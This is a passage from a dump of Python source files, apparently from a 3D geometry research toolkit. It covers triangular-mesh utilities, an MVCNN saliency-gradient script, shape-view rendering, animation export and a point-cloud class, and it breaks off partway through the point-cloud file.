"text": "'''\nCreated on July 18, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport itertools\nimport warnings\nimport copy\nimport numpy as np\nfrom scipy import sparse as sp\nfrom numpy.matlib import repmat\nfrom six.moves import cPickle\n\nfrom general_tools.arrays.basics import unique_rows\n\nfrom . mesh_cleaning import filter_vertices\n\nfrom .. utils import linalg_utils as utils\nfrom .. utils.linalg_utils import accumarray\nfrom .. in_out import soup as io\nfrom .. fundamentals import Graph, Cuboid\nfrom .. point_clouds import Point_Cloud\n\n# try:\n# from mayavi import mlab as mayalab\n# except:\n# warnings.warn('Mayavi library was not found. Some graphics utilities will be disabled.')\n\nl2_norm = utils.l2_norm\n\n\nclass Mesh(object):\n '''\n A class representing a triangular Mesh of a 3D surface. Provides a variety of relevant functions, including\n loading and plotting utilities.\n '''\n def __init__(self, vertices=None, triangles=None, file_name=None):\n '''Mesh Constructor.\n Args:\n vertices (N x 3 numpy array): where N is the number of vertices of the underlying mesh.\n triangles (T x 3 numpy array): where T is the number of triangles of the underlying mesh.\n Each line specifies the 3 vertices that that the particular triangle references in the\n \\'vertices\\' list.\n file_name (optional, String): file name of an .obj or .off file. If given, the mesh will be\n loaded from this file.\n '''\n if file_name is not None:\n self.vertices, self.triangles = io.load_mesh_from_file(file_name)[:2]\n else:\n self.vertices = vertices\n self.triangles = triangles\n\n def __str__(self):\n return 'Mesh with %d vertices and %d triangles.' % (self.num_vertices, self.num_triangles)\n\n @property\n def vertices(self):\n return self._vertices\n\n @property\n def triangles(self):\n return self._triangles\n\n @vertices.setter\n def vertices(self, value):\n self._vertices = value\n self.num_vertices = len(self._vertices)\n\n @triangles.setter\n def triangles(self, value):\n self._triangles = value\n self.num_triangles = len(self._triangles)\n if not all([len(set(tr)) == 3 for tr in self._triangles]):\n warnings.warn('Not real triangles (but lines or points) exist in the triangle list.')\n if np.max(self._triangles) > self.num_vertices - 1 or np.min(self._triangles) < 0:\n raise ValueError('Triangles referencing non-vertices.')\n\n def copy(self):\n return copy.deepcopy(self)\n\n def save(self, file_out):\n with open(file_out, \"wb\") as f_out:\n cPickle.dump(self, f_out, protocol=2)\n\n def plot(self, triangle_function=np.array([]), vertex_function=np.array([]), show=True, *args, **kwargs):\n if vertex_function.any() and triangle_function.any():\n raise ValueError('Either the vertices or the faces can mandate color. Not both.')\n\n if triangle_function.any():\n if len(triangle_function) != self.num_triangles:\n raise ValueError('Function of triangles has inappropriate number of elements.')\n mesh_plot = mayalab.triangular_mesh(self.vertices[:, 0], self.vertices[:, 1], self.vertices[:, 2], self.triangles, *args, **kwargs)\n self.__decorate_mesh_with_triangle_color(mesh_plot, triangle_function)\n\n elif vertex_function.any():\n if len(vertex_function) != self.num_vertices:\n raise ValueError('Function of vertices has inappropriate number of elements.')\n mesh_plot = mayalab.triangular_mesh(self.vertices[:, 0], self.vertices[:, 1], self.vertices[:, 2], self.triangles, scalars=vertex_function, *args, **kwargs)\n\n else:\n mesh_plot = mayalab.triangular_mesh(self.vertices[:, 0], self.vertices[:, 1], self.vertices[:, 2], self.triangles, *args, **kwargs)\n\n if show:\n mayalab.show()\n\n return mesh_plot\n\n def plot_normals(self, scale_factor=1, representation='mesh'):\n self.plot(show=False, representation=representation)\n bary = self.barycenter_of_triangles()\n normals = Mesh.normals_of_triangles(self.vertices, self.triangles)\n mayalab.quiver3d(bary[:, 0], bary[:, 1], bary[:, 2], normals[:, 0], normals[:, 1], normals[:, 2], scale_factor=scale_factor)\n mayalab.show()\n\n def undirected_edges(self):\n perm_gen = lambda x: list(itertools.permutations(x, 2))\n edges = np.zeros(shape=(self.num_triangles, 6, 2), dtype=np.int32) # Each triangle produces 6 undirected edges.\n for i, t in enumerate(self.triangles):\n edges[i, :] = perm_gen(t)\n edges.resize(self.num_triangles * 6, 2)\n return unique_rows(edges)\n\n def directed_edges(self):\n ''' For each triangle (A,B,C) we consider the edges (A,B) and (B,C), i.e., the direction comes from\n the order the vertices are listed in the triangles.\n TODO-P.\n '''\n pass\n\n def boundary(self):\n ''' TODO-P\n https://www.mathworks.com/matlabcentral/mlc-downloads/downloads/submissions/5355/versions/5/previews/toolbox_graph/compute_boundary.m/index.html?access_key=\n '''\n pass\n\n def correct_mesh_orientation(self):\n '''https://github.com/scikit-image/scikit-image/blob/master/skimage/measure/_marching_cubes_classic.py\n TODO-L\n '''\n pass\n\n def adjacency_matrix(self):\n E = self.undirected_edges()\n vals = np.squeeze(np.ones((len(E), 1)))\n return sp.csr_matrix((vals, (E[:, 0], E[:, 1])), shape=(self.num_vertices, self.num_vertices))\n\n def connected_components(self):\n return Graph.connected_components(self.adjacency_matrix())\n\n def largest_connected_component(self):\n # TODO operates on self or copy?\n ncc, node_labels = self.connected_components()\n if ncc == 1:\n return self\n unique_labels, counts = np.unique(node_labels, return_counts=True)\n maximizer = unique_labels[np.argmax(counts)]\n keep_nodes = np.where(node_labels == maximizer)[0]\n return filter_vertices(self, keep_nodes)\n\n def barycenter_of_triangles(self):\n tr_in_xyz = self.vertices[self.triangles]\n return np.sum(tr_in_xyz, axis=1) / 3.0\n\n def edge_length_of_triangles(self):\n '''Computes the length of each edge, of each triangle in the underlying triangular mesh.\n\n Returns:\n L - (num_of_triangles x 3) L[i] is a triplet containing the lengths of the 3 edges corresponding to the i-th triangle.\n The enumeration of the triangles is the same at in -T- and the order in which the edges are\n computed is (V2, V3), (V1, V3) (V1, V2). I.e. L[i][2] is the edge length between the 1st\n vertex and the second vertex of the i-th triangle.'''\n V = self.vertices\n T = self.triangles\n L1 = l2_norm(V[T[:, 1], :] - V[T[:, 2], :], axis=1)\n L2 = l2_norm(V[T[:, 0], :] - V[T[:, 2], :], axis=1)\n L3 = l2_norm(V[T[:, 0], :] - V[T[:, 1], :], axis=1)\n return np.transpose(np.vstack([L1, L2, L3]))\n\n def inverse_triangle_dictionary(self):\n '''Returns a dictionary mapping triangles, i.e., triplets (n1, n2, n3) into their\n position in the array of triangles kept.\n '''\n keys = map(tuple, self.triangles)\n return dict(zip(keys, range(len(keys))))\n\n def angles_of_triangles(self):\n # TODO: Consider compute via way mentioned in Meyer's\n L = self.edge_length_of_triangles()\n L1 = L[:, 0]\n L2 = L[:, 1]\n L3 = L[:, 2]\n\n L1_sq = np.square(L1)\n L2_sq = np.square(L2)\n L3_sq = np.square(L3)\n\n A1 = (L2_sq + L3_sq - L1_sq) / (2. * L2 * L3) # Cosine of angles for first set of edges.\n A2 = (L1_sq + L3_sq - L2_sq) / (2 * L1 * L3)\n A3 = (L1_sq + L2_sq - L3_sq) / (2 * L1 * L2)\n A = np.transpose(np.vstack([A1, A2, A3]))\n\n if np.any(A <= -1) or np.any(A >= 1) or (np.isfinite(A) == False).any():\n warnings.warn('The mesh has degenerate triangles with angles outside the (0,pi) interval. This angles will be set to 0.')\n A[np.logical_or(A >= 1, A <= -1, np.isfinite(A) == False)] = 1\n\n A = np.arccos(A)\n assert(np.all(np.logical_and(A < np.pi, A >= 0)))\n return A\n\n def area_of_triangles(self):\n '''Computes the area of each triangle, in a triangular mesh.\n '''\n A = Mesh.normals_of_triangles(self.vertices, self.triangles)\n A = l2_norm(A, axis=1) / 2.0\n if np.any(A <= 0):\n warnings.warn('The mesh has triangles with non positive area.')\n return A\n\n def area_of_vertices(self, area_type='barycentric'):\n '''\n area_type == 'barycentric' associates with every vertex the area of its adjacent barycentric cells.\n 'barycentric_avg' same as 'barycentric' but post multiplied with the adjacency matrix. I.e.,\n each node is assigned the average of the barycentric areas of it's neighboring nodes.\n '''\n def barycentric_area():\n I = np.hstack([T[:, 0], T[:, 1], T[:, 2]])\n J = np.hstack([T[:, 1], T[:, 2], T[:, 0]])\n Mij = (1.0 / 12) * np.hstack([Ar, Ar, Ar])\n Mji = np.copy(Mij)\n Mii = (1.0 / 6) * np.hstack([Ar, Ar, Ar])\n In = np.hstack([I, J, I])\n Jn = np.hstack([J, I, I])\n Mn = np.hstack([Mij, Mji, Mii])\n M = sp.csr_matrix((Mn, (In, Jn)), shape=(self.num_vertices, self.num_vertices))\n M = np.array(M.sum(axis=1))\n return M\n\n Ar = self.area_of_triangles()\n T = self.triangles\n\n if area_type == 'barycentric':\n M = barycentric_area()\n elif area_type == 'barycentric_avg':\n M = self.adjacency_matrix() * barycentric_area()\n else:\n raise(NotImplementedError)\n\n if np.any(M <= 0):\n warnings.warn('The area_type \\'%s\\' produced vertices with non-positive area.' % (area_type))\n return M\n\n def sum_vertex_function_on_triangles(self, v_func):\n if len(v_func) != self.num_vertices:\n raise ValueError('Provided vertex function has inappropriate dimensions. ')\n T = self.triangles\n tr_func = v_func[T[:, 0]] + v_func[T[:, 1]] + v_func[T[:, 2]]\n return tr_func\n\n def barycentric_interpolation_of_vertex_function(self, v_func, key_points, faces_of_key_points):\n ''' It computes the linearly interpolated values of a vertex function, over a set of 3D key-points that\n reside inside the mesh triangles.\n\n Args:\n v_func (num_vertices x 1 numpy array).\n key_points (M x 3 numpy array): coordinates of 3D points.\n faces_of_key_points (M x 1): face ids of the faces each key_point resides on.\n\n Returns:\n (M x 1): Function that linearly interpolates the v_func on each key_point.\n '''\n\n if len(v_func) != self.num_vertices:\n raise ValueError('Provided vertex function has inappropriate dimensions. ')\n\n A = self.vertices[self.triangles[faces_of_key_points, 0], :] # 1st Vertex of each referenced triangle.\n B = self.vertices[self.triangles[faces_of_key_points, 1], :]\n C = self.vertices[self.triangles[faces_of_key_points, 2], :]\n\n total_area = l2_norm(np.cross(A - B, A - C), axis=1) # 2 Times area of each referenced triangle.\n\n # Barycentric Coefficients of the three 'barycentric' triangles in each triangle (i.e. the ratio of their areas to the total_area)\n c_0 = l2_norm(np.cross(key_points - B, B - C), axis=1) / total_area\n c_1 = l2_norm(np.cross(key_points - A, A - C), axis=1) / total_area\n c_2 = l2_norm(np.cross(key_points - A, A - B), axis=1) / total_area\n\n vf_0 = v_func[self.triangles[faces_of_key_points, 0]]\n vf_1 = v_func[self.triangles[faces_of_key_points, 1]]\n vf_2 = v_func[self.triangles[faces_of_key_points, 2]]\n res = (c_0 * vf_0) + (c_1 * vf_1) + (c_2 * vf_2)\n return res\n\n def normals_of_vertices(self, weight='areas', normalize=False):\n '''Computes the outward normal at each vertex by adding the weighted normals of each triangle a\n vertex is adjacent to. The weights that are used to combine the normals are the areas of the triangles\n a normal comes from.\n\n Args:\n normalize (boolean): if True, then the normals have unit length.\n\n Returns:\n N - (num_of_vertices x 3) an array containing the normalized outward normals of all the vertices.\n '''\n V = self.vertices\n T = self.triangles\n\n normals = Mesh.normals_of_triangles(V, T, normalize=True)\n if weight == 'areas':\n weights = self.area_of_triangles()\n normals = (normals.T * weights).T\n\n nx = accumarray(T.ravel('C'), repmat(np.array([normals[:, 0]]).T, 1, 3).ravel('C'))\n ny = accumarray(T.ravel('C'), repmat(np.array([normals[:, 1]]).T, 1, 3).ravel('C'))\n nz = accumarray(T.ravel('C'), repmat(np.array([normals[:, 2]]).T, 1, 3).ravel('C'))\n normals = (np.vstack([nx, ny, nz])).T\n\n if normalize:\n row_norms = l2_norm(normals, axis=1)\n row_norms[row_norms == 0] = 1\n normals = (normals.T / row_norms).T\n\n return normals\n\n def bounding_box(self):\n return Cuboid.bounding_box_of_3d_points(self.vertices)\n\n def center_in_unit_sphere(self, force_scaling=False):\n self.vertices = Point_Cloud.center_points(self.vertices, center='unit_sphere', force_scaling=force_scaling)\n return self\n\n def sample_faces(self, n_samples, vertex_weights=None, seed=None, compute_normals=False):\n \"\"\"Generates a point cloud representing the surface of the mesh by sampling points proportionally to the area of each face.\n\n Args:\n n_samples (int) : number of points to be sampled in total\n vertex_weights ():\n compute_normals (boolean):\n Returns:\n numpy array (n_samples, 3) containing the [x,y,z] coordinates of the samples.\n If compute_normals is True: \n\n Reference :\n http://chrischoy.github.in_out/research/barycentric-coordinate-for-mesh-sampling/\n [1] Barycentric coordinate system\n\n \\begin{align}\n P = (1 - \\sqrt{r_1})A + \\sqrt{r_1} (1 - r_2) B + \\sqrt{r_1} r_2 C\n \\end{align}\n \"\"\"\n\n face_areas = self.area_of_triangles()\n\n if vertex_weights is not None:\n if np.any(vertex_weights < 0):\n raise ValueError('Negative vertex weights detected.')\n face_weights = self.sum_vertex_function_on_triangles(vertex_weights)\n face_areas = np.multiply(face_areas, face_weights)\n\n face_areas = face_areas / np.sum(face_areas) # Convert to probability.\n\n if seed is not None:\n np.random.seed(seed)\n\n sample_face_idx = np.random.choice(self.num_triangles, n_samples, p=face_areas)\n\n r = np.random.rand(n_samples, 2)\n A = self.vertices[self.triangles[sample_face_idx, 0], :]\n B = self.vertices[self.triangles[sample_face_idx, 1], :]\n C = self.vertices[self.triangles[sample_face_idx, 2], :]\n m = np.sqrt(r[:, 0:1])\n n = r[:, 1:]\n P = (1 - m) * A + m * (1 - n) * B + m * n * C\n\n # If normals are computed, returns Nx6 matrices where last 3 are the normals.\n if compute_normals:\n nV = self.normals_of_vertices(normalize=True) \n #nV = self.normals_of_triangles(self.vertices, self.triangles, normalize=True)\n \n nA = nV[self.triangles[sample_face_idx, 0], :]\n nB = nV[self.triangles[sample_face_idx, 1], :]\n nC = nV[self.triangles[sample_face_idx, 2], :]\n nP = (1 - m) * nA + m * (1 - n) * nB + m * n * nC\n P = np.append(P, nP, axis=1)\n\n return P, sample_face_idx\n\n def swap_axes_of_vertices(self, permutation):\n v = self.vertices\n nv = self.num_vertices\n vx = v[:, permutation[0]].reshape(nv, 1)\n vy = v[:, permutation[1]].reshape(nv, 1)\n vz = v[:, permutation[2]].reshape(nv, 1)\n self.vertices = np.hstack((vx, vy, vz))\n\n def swap_axes_of_triangles(self, permutation):\n t = self.triangles\n nt = self.num_triangles\n t0 = t[:, permutation[0]].reshape(nt, 1)\n t1 = t[:, permutation[1]].reshape(nt, 1)\n t2 = t[:, permutation[2]].reshape(nt, 1)\n self.triangles = np.hstack((t0, t1, t2))\n\n def swap_axes_of_vertices_and_triangles(self, permutation):\n self.swap_axes_of_triangles(permutation)\n self.swap_axes_of_vertices(permutation)\n\n def volume(self):\n '''\n Estimates the volume of the mesh. The estimate is correct for meshes with no overlapping or intersecting triangles.\n See: http://stackoverflow.com/questions/1406029/how-to-calculate-the-volume-of-a-3d-mesh-object-the-surface-of-which-is-made-up\n '''\n V = self.vertices\n T = self.triangles\n P1 = V[T[:, 0], :]\n P2 = V[T[:, 1], :]\n P3 = V[T[:, 2], :]\n v321 = P3[:, 0] * P2[:, 1] * P1[:, 2]\n v231 = P2[:, 0] * P3[:, 1] * P1[:, 2]\n v312 = P3[:, 0] * P1[:, 1] * P2[:, 2]\n v132 = P1[:, 0] * P3[:, 1] * P2[:, 2]\n v213 = P2[:, 0] * P1[:, 1] * P3[:, 2]\n v123 = P1[:, 0] * P2[:, 1] * P3[:, 2]\n return (1.0 / 6.0) * np.sum(-v321 + v231 + v312 - v132 - v213 + v123)\n# return (1.0 / 6.0) * np.sum((np.cross(P2, P3) * P1)) # Faster but a bit more unstable version.\n\n @staticmethod\n def __decorate_mesh_with_triangle_color(mesh_plot, triangle_function): # TODO-P do we really need this to be static?\n mesh_plot.mlab_source.dataset.cell_data.scalars = triangle_function\n mesh_plot.mlab_source.dataset.cell_data.scalars.name = 'Cell data'\n mesh_plot.mlab_source.update()\n mesh2 = mayalab.pipeline.set_active_attribute(mesh_plot, cell_scalars='Cell data')\n mayalab.pipeline.surface(mesh2)\n\n @staticmethod\n def normals_of_triangles(V, T, normalize=False):\n '''Computes the normal vector of each triangle of a given mesh.\n Args:\n V - (num_of_vertices x 3) 3D coordinates of the mesh vertices.\n T - (num_of_triangles x 3) T[i] are the 3 indices corresponding to the 3 vertices of\n the i-th triangle. The indexing is based on -V-.\n normalize - (Boolean, optional) if True, the normals will be normalized to have unit lenght.\n\n Returns:\n N - (num_of_triangles x 3) an array containing the outward normals of all the triangles.\n '''\n # TODO See this: https://www.mathworks.com/matlabcentral/fileexchange/5355-toolbox-graph/content/toolbox_graph/compute_normal.m\n N = np.cross(V[T[:, 0], :] - V[T[:, 1], :], V[T[:, 0], :] - V[T[:, 2], :])\n if normalize:\n row_norms = l2_norm(N, axis=1)\n N = (N.T / row_norms).T\n return N\n\n @staticmethod\n def load(in_file):\n with open(in_file, 'rb') as f_in:\n res = cPickle.load(f_in)\n return res\n\n\n# #taubin's approximation for principle curvatures\n# #TODO finish\n# def principle_curvatures(self):\n# T=self.triangles\n# V=self.vertices\n# E=self.build_edges()\n# areaT=self.area_of_triangles()\n# normV=self.normals_of_vertices(normalize=True)\n# pij = None\n# mij = None\n# ni= None\n# vi=0\n# for i in range(V.shape[0]):\n# nbs=np.where(E[i,:] >= 0)\n# ni=np.expand_dims(normV[i,:], axis=1)\n# pij=np.identity(3)-ni*ni.T\n# mij=np.zeros((3,3))\n# wts=0\n# for j in range(nbs.shape[0]):\n# dij=np.expand_dims(V[i,:]-V[j,:],axis=1)\n# kij=2*(ni.T*dij)/l2_norm(dij)\n# tij=pij*dij\n# tij=tij/l2_norm(tij)\n# wij=areaT[E[i,j]]\n# if areaT[E[j,i]]>=0:\n# wij=wij+areaT[E[j,i]]\n# mij=wij*kij*tij*tij.T\n# wts=wts+wij\n# mij=mij/wts"
},
{
"alpha_fraction": 0.5434604287147522,
"alphanum_fraction": 0.5703157186508179,
"avg_line_length": 36.2442741394043,
"blob_id": "1f47cd6f7d67f8ca6534857356cae270f63d9f64",
"content_id": "df779816586095f61e330fdedbdf9d4312bc76e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4878,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 131,
"path": "/scripts/mvcnn_wrapper.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "import sys\nimport tensorflow as tf\nimport numpy as np\n\ngit_path = '/Users/t_achlp/Documents/Git_Repos/'\nsys.path.insert(0, git_path)\n\nfrom autotensor import autograph\nimport nn_saliency.src.nn_io as nn_io\n\n\nIMG_SIZE = (224, 224)\nPART_VIEWS = 80\nNUM_CLASSES = 20\n\nimage_pl = tf.placeholder(tf.float32, shape=(None, IMG_SIZE[0], IMG_SIZE[1], 1))\nkeep_prob = tf.placeholder(tf.float32, name='keep_prob')\ng = autograph()\n\ndef compute_inferenceA(input) :\n \n layer = g.conv2d(input, filters=96, field_size=7, stride=2, padding='SAME', name=\"conv1\")\\\n .relu()\\\n .maxpool(kernel=(3,3), stride=(2,2))\\\n .lrn(radius=5, bias=2, alpha=0.0001/5.0, beta=0.75)\n \n layer = g.conv2d(layer, filters=256, field_size=5, stride=2, padding='SAME', name=\"conv2\")\\\n .relu()\\\n .maxpool(kernel=(3,3), stride=(2,2))\\\n .lrn(radius=5, bias=2, alpha=0.0001/5.0, beta=0.75)\n \n layer = g.conv2d(layer, filters=256, field_size=3, stride=1, padding='SAME', name=\"conv3\")\\\n .relu()\n\n layer = g.conv2d(layer, filters=256, field_size=3, stride=1, padding='SAME', name=\"conv4\")\\\n .relu()\n\n layer = g.conv2d(layer, filters=256, field_size=3, stride=1, padding='SAME', name=\"conv5\")\\\n .relu()\\\n .maxpool(kernel=(3,3), stride=(2,2))\n\n return layer\n \n \ndef compute_inferenceB(input) :\n \n layer = g.fully_connected(input, 4096, name=\"fc6\")\\\n .relu()\\\n .dropout(keep_prob)\n \n layer = g.fully_connected(layer, 4096, name=\"fc7\")\\\n .relu()\\\n .dropout(keep_prob)\n \n layer = g.fully_connected(layer, NUM_CLASSES, name=\"fc8\")\\\n .relu()\\\n .dropout(keep_prob)\n \n return layer\n\n\ndef compute_3d_inference(input) :\n \n # Reshape to just treat as an array of images.\n in_bundle = tf.reshape(input, [-1, IMG_SIZE[1], IMG_SIZE[0], 1])\n\n # Compute first stage of inference (treating each image independently)\n inf = compute_inferenceA(g.wrap(in_bundle)).unwrap()\n\n # Get the shape of the current inference tensor (from the Conv layers)\n inf_shape = inf.get_shape().as_list()\n \n # Reshape the results again to be in buckets of images per solid\n inf = tf.reshape(inf, [-1, PART_VIEWS, inf_shape[1], inf_shape[2], inf_shape[3]])\n\n # Compute the maximum value across the views and reduce the tensor to that.\n reduce_inf = tf.reduce_max(inf, reduction_indices=1) \n \n # Compute second stage of inference on the max-reduced data (each across all images for a given shape)\n final_inf = compute_inferenceB(g.wrap(reduce_inf, channels=256)).unwrap()\n \n return final_inf\n\n\ndef mvcnn_gradients(): \n pred_layer = compute_3d_inference(image_pl)\n max_class = tf.reduce_max(pred_layer, 1)\n # soft_max = tf.nn.softmax(pred_layer)\n # num_classes = pred_layer.get_shape().as_list()[-1]\n # all_other_classes = tf.div(tf.reduce_sum(pred_layer, 1) - max_class, num_classes)\n grads = tf.gradients(max_class, image_pl)\n return grads \n\n\ndef initialize_session():\n saver = tf.train.Saver()\n ckpt_file = '/Users/t_achlp/Documents/DATA/NN/Models/MVCCN/DG/mvcnn_5_20_70_80.ckpt'\n sess = g.session()\n sess.start()\n in_sess = sess.session\n saver.restore(in_sess, ckpt_file)\n return in_sess\n\ndef compute_gradients(views_folder, grad_model=None, in_sess=None):\n if grad_model is None:\n grad_model = mvcnn_gradients()\n \n if in_sess is None:\n in_sess = initialize_session()\n \n view_tensor, _, _ = nn_io.load_views_of_shape(views_folder, file_format='png', shape_views=PART_VIEWS, reshape_to=IMG_SIZE)\n view_tensor = nn_io.format_image_tensor_for_tf(view_tensor, whiten=True) \n feed = {image_pl: view_tensor, keep_prob: 1}\n \n return in_sess.run([grad_model[0]], feed_dict=feed), grad_model, in_sess\n\n\nimport os.path as osp\nimport os\nif __name__ == '__main__': \n top_view_dir = sys.argv[1]\n sub_dirs = [f for f in os.listdir(top_view_dir) if osp.isdir(osp.join(top_view_dir,f))] # expected to be folders of the views.\n sub_dirs = [osp.join(top_view_dir, d) for d in sub_dirs]\n \n res, grad_model, in_sess = compute_gradients(sub_dirs[0])\n np.savez(osp.join(sub_dirs[0], 'raw_grads'), res[0])\n \n for views in sub_dirs[1:]:\n print views \n res = compute_gradients(views, grad_model, in_sess)\n np.savez(osp.join(views, 'raw_grads'), res[0])"
},
{
"alpha_fraction": 0.5467653870582581,
"alphanum_fraction": 0.553780198097229,
"avg_line_length": 32.77631759643555,
"blob_id": "7adfd22f7d04182899d23d76e1f03d2f8b9c342d",
"content_id": "6194485109ce38d6812838df0462fb83fb0f4a4f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2566,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 76,
"path": "/rendering/shape_views.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 25, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport os.path as osp\nimport matplotlib.pylab as plt\n\nfrom .. in_out import soup as nn_io\n\n\nclass Shape_Views():\n '''\n classdocs\n '''\n\n def __init__(self, view_folder, file_format):\n '''\n Constructor\n '''\n data = nn_io.load_views_of_shape(view_folder, file_format)\n self.views = data[0]\n self.cam_pos = data[1]\n self.masks = data[2]\n self.inv_dict = {(pos[0], pos[1]): i for i, pos in enumerate(self.cam_pos)}\n\n def num_views(self):\n return self.views.shape[0]\n\n def image_size(self):\n return self.views[0].shape\n\n def plot(self, vertex_id, twist_id, mask=False):\n index = self.inv_dict[(vertex_id, twist_id)]\n if mask:\n im = self.masks[index, :, :]\n else:\n im = self.views[index, :, :]\n# plt.figure() # TO DO - keep opening new figures\n plt.imshow(im)\n plt.show()\n\n def export_masks_to_txt(self, save_dir):\n '''\n Exports the masks attribute into .txt files. Each file corresponds to one view (vertex_id, twist_id)\n and lists every pixel that belongs in the mask into a separate line.\n '''\n nn_io.create_dir(save_dir)\n for i, mask in enumerate(self.masks):\n y_coord, x_coord = np.where(mask)\n out_file = 'pixels_' + str(self.cam_pos[i][0]) + '_' + str(self.cam_pos[i][1]) + '.txt'\n out_file = osp.join(save_dir, out_file)\n nn_io.write_pixel_list_to_txt(x_coord, y_coord, out_file)\n\n def paint_masks_to_triangle_color(self, bt, tr_color):\n res = np.zeros(self.masks.shape)\n for i, mask in enumerate(self.masks):\n vertex_id, twist_id = self.cam_pos[i]\n if not bt.is_legit_view_and_twist(vertex_id, twist_id): \n raise ValueError('Back_Tracer and View_Gradients don\\'t agree on the set of views.') \n y_coord, x_coord = np.where(mask != 0)\n for x, y in zip(x_coord, y_coord):\n try:\n triangle = bt.from_2D_to_3D((x,y), vertex_id, twist_id)\n res[i,y,x] = tr_color[triangle]\n except:\n pass\n return res\n\nif __name__ == '__main__':\n sv = Shape_Views('../Data/Screw/Views', 'png')\n sv.export_masks_to_txt('../Data/Screw/Masks')"
},
{
"alpha_fraction": 0.6225937008857727,
"alphanum_fraction": 0.6357649564743042,
"avg_line_length": 33.05172348022461,
"blob_id": "1754efbd43e522c5899599de772f556c08492c8d",
"content_id": "3498be3c309a66bb83d2f5ec95049195aa229010",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1974,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 58,
"path": "/scripts/animate.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panayotes Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\nimport os\nimport re\nimport cv2\nfrom glob import glob\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\ntry:\n from mayavi import mlab as mayalab\nexcept:\n warnings.warn('Mayavi library was not found. Some graphics utilities will be disabled.')\n \n\[email protected]\[email protected](delay=10)\ndef animate_surface(mesh_surf, output_dir):\n scene = mesh_surf.scene\n camera = scene.camera\n for i in range(36):\n camera.azimuth(10)\n camera.pitch(5)\n scene.reset_zoom()\n yield \n scene.save_png(output_dir + '/anim%d.png'%i)\n\ndef export_animation(animation_dir, animation_name):\n imagelist = load_animation_images(animation_dir)\n fig = plt.figure() # make figure\n im = plt.imshow(imagelist[0]) #TODO fix vmin/vmax for cmap:, cmap=plt.get_cmap('jet'), vmin=np.min(imagelist[0]), vmax=np.max(imagelist[0]))\n # function to update figure\n def updatefig(j): \n im.set_array(imagelist[j])\n return im,\n # kick off the animation\n ani = animation.FuncAnimation(fig, updatefig, frames=len(imagelist), interval=370, blit=False)\n ani.save(os.path.join(animation_dir, animation_name+'.mp4'))\n \ndef load_animation_images(folder, file_format='png'):\n searh_pattern = os.path.join(folder, '*.' + file_format) \n im_names = [n for n in glob(searh_pattern)]\n im_order = list()\n image_data = list()\n for name in im_names:\n m = re.search('(\\d+).png$', name)\n im_order.append(int(m.groups()[0]))\n \n visit = ([i[0] for i in sorted(enumerate(im_order), key=lambda x:x[1])])\n \n for im_id in visit:\n image_data.append(cv2.imread(im_names[im_id], cv2.IMREAD_UNCHANGED)) \n return image_data"
},
{
"alpha_fraction": 0.5644097924232483,
"alphanum_fraction": 0.5772266983985901,
"avg_line_length": 35.747440338134766,
"blob_id": "32262f63f7eae6f64efa8031e46942918766ff0c",
"content_id": "c44322e92c01e08e39c0d9043cebe7a0d9c35d4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10767,
"license_type": "permissive",
"max_line_length": 202,
"num_lines": 293,
"path": "/point_clouds/point_cloud.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 8, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\n\nimport copy\nimport warnings\nimport numpy as np\nimport matplotlib.cm as cm \nfrom scipy.linalg import eigh\nfrom numpy.matlib import repmat\nfrom six.moves import cPickle\n\ntry:\n from sklearn.neighbors import NearestNeighbors\nexcept:\n warnings.warn('Sklearn library is not installed.')\n\ntry:\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\nexcept:\n warnings.warn('Pyplot library is not fully working. Limited plotting utilities are available.')\n\nfrom .. external_code.python_plyfile.plyfile import PlyElement, PlyData\nfrom .. in_out import soup as io\nfrom .. utils import linalg_utils as utils\nfrom .. fundamentals import Cuboid\n\nl2_norm = utils.l2_norm\n\n\nclass Point_Cloud(object):\n '''\n A class representing a 3D Point Cloud.\n Dependencies:\n 1. plyfile 0.4: PLY file reader/writer. DOI: https://pypi.python.org/pypi/plyfile\n '''\n def __init__(self, points=None, ply_file=None):\n '''\n Constructor\n '''\n if ply_file is not None:\n self.points = io.load_ply(ply_file)\n else:\n self.points = points\n\n @property\n def points(self):\n return self._points\n\n @points.setter\n def points(self, value):\n self._points = value\n self.num_points = len(self._points)\n\n def __str__(self):\n return 'Point Cloud with %d points.' % (self.num_points)\n\n def __getitem__(self, key):\n return self.points[key]\n\n def save(self, file_out):\n with open(file_out, \"wb\") as f_out:\n cPickle.dump(self, f_out, protocol=2)\n\n def copy(self):\n return copy.deepcopy(self)\n\n def permute_points(self, permutation):\n if len(permutation) != 3 or not np.all(np.equal(sorted(permutation), np.array([0, 1, 2]))):\n raise ValueError()\n self.points = self.points[:, permutation]\n return self\n\n def sample(self, n_samples, replacement=False):\n if n_samples > self.num_points:\n replacement = True\n rindex = np.random.choice(self.num_points, n_samples, replace=replacement)\n return Point_Cloud(points=self.points[rindex, :]), rindex\n\n def apply_mask(self, bool_mask):\n return Point_Cloud(self.points[bool_mask, :])\n\n def bounding_box(self):\n return 